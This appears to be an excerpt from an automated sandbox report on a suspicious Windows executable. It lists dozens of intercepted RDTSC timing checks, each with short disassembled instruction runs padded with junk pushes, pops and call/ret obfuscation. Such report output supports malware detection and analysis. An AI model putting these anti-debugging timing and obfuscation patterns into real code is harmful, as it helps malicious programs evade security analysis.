                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA21A second address: 10FA22C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD09CB0C7EAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA2E8 second address: 10FA2FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FD09CF151BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA2FD second address: 10FA301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA301 second address: 10FA306 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA39C second address: 10FA3C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD09CB0C7EFh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA3C7 second address: 10FA3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10FA3CB second address: 10FA3E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD09CB0C7EEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111AF03 second address: 111AF0D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1118D51 second address: 1118D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11192C2 second address: 11192C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111952D second address: 1119531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119531 second address: 1119543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD09CF151B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119543 second address: 1119547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11199BE second address: 11199C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11199C2 second address: 11199D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnl 00007FD09CB0C7E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11199D2 second address: 11199D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11199D8 second address: 11199E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119C29 second address: 1119C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119C31 second address: 1119C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FD09CB0C7F2h 0x0000000b ja 00007FD09CB0C7E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119C44 second address: 1119C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119DA7 second address: 1119DAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119DAB second address: 1119DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119DB1 second address: 1119DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119DBB second address: 1119DBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119F5C second address: 1119F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119F76 second address: 1119F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FD09CF151C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119F83 second address: 1119F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119F89 second address: 1119F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1119F90 second address: 1119F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD09CB0C7E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A60C second address: 111A625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FD09CF151C0h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A625 second address: 111A62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A91B second address: 111A91F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A91F second address: 111A95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007FD09CB0C7E6h 0x00000011 js 00007FD09CB0C7E6h 0x00000017 popad 0x00000018 jmp 00007FD09CB0C7F6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 js 00007FD09CB0C7EEh 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A95A second address: 111A96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 111A96B second address: 111A972 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10E3D72 second address: 10E3D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10E3D76 second address: 10E3DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FD09CB0C7F5h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 jmp 00007FD09CB0C7F9h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD09CB0C7EFh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1121DB9 second address: 1121DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1121DD1 second address: 1121DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D9AA0 second address: 10D9AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D9AA6 second address: 10D9AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1125278 second address: 112528A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD09CF151B6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112528A second address: 1125290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1125290 second address: 112529A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D9A8C second address: 10D9AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD09CB0C7ECh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11256F2 second address: 11256F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112583D second address: 1125843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1125843 second address: 1125848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1125848 second address: 112584D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112584D second address: 1125853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1125853 second address: 1125875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD09CB0C7E6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD09CB0C7F5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11259B2 second address: 11259C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a ja 00007FD09CF151B6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11259C2 second address: 11259C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11259C8 second address: 11259D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112705F second address: 1127064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11273F0 second address: 1127403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127403 second address: 1127407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127407 second address: 112740B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11274B7 second address: 11274C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD09CB0C7E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127687 second address: 112768B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127748 second address: 1127751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127BFC second address: 1127C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151BFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127C0F second address: 1127C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127C13 second address: 1127C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD09CF151B8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 jns 00007FD09CF151B6h 0x0000002b push eax 0x0000002c jo 00007FD09CF151BEh 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127D96 second address: 1127D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127D9C second address: 1127DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e je 00007FD09CF151B6h 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127F6B second address: 1127F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127F71 second address: 1127F88 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FD09CF151B8h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127F88 second address: 1127F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1127F8E second address: 1127F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1128132 second address: 112818B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD09CB0C7EEh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FD09CB0C7E8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 jmp 00007FD09CB0C7F8h 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push ebx 0x00000031 jo 00007FD09CB0C7E6h 0x00000037 pop ebx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112818B second address: 1128195 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1128620 second address: 1128643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD09CB0C7F5h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1128643 second address: 1128655 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1128655 second address: 11286C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov ax, 6B00h 0x0000000e jc 00007FD09CB0C7ECh 0x00000014 mov edi, dword ptr [ebp+122D2D21h] 0x0000001a popad 0x0000001b push 00000000h 0x0000001d jmp 00007FD09CB0C7F6h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FD09CB0C7E8h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e sbb di, A1FBh 0x00000043 clc 0x00000044 xchg eax, ebx 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FD09CB0C7ECh 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11286C5 second address: 11286E9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FD09CF151BCh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FD09CF151BAh 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11286E9 second address: 11286EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11290C0 second address: 1129140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007FD09CF151C6h 0x0000000b nop 0x0000000c sbb si, AC25h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FD09CF151B8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FD09CF151B8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 movzx edi, di 0x0000004c mov edi, dword ptr [ebp+122D2E69h] 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 ja 00007FD09CF151B6h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1129140 second address: 112914A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112914A second address: 1129150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1129150 second address: 1129154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112A2C0 second address: 112A2D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1129A72 second address: 1129A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CB0C7F6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112AACD second address: 112AAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112AAD6 second address: 112AADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112AADA second address: 112AADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112C274 second address: 112C28A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CB0C7ECh 0x00000008 jo 00007FD09CB0C7E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112BFA8 second address: 112BFC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
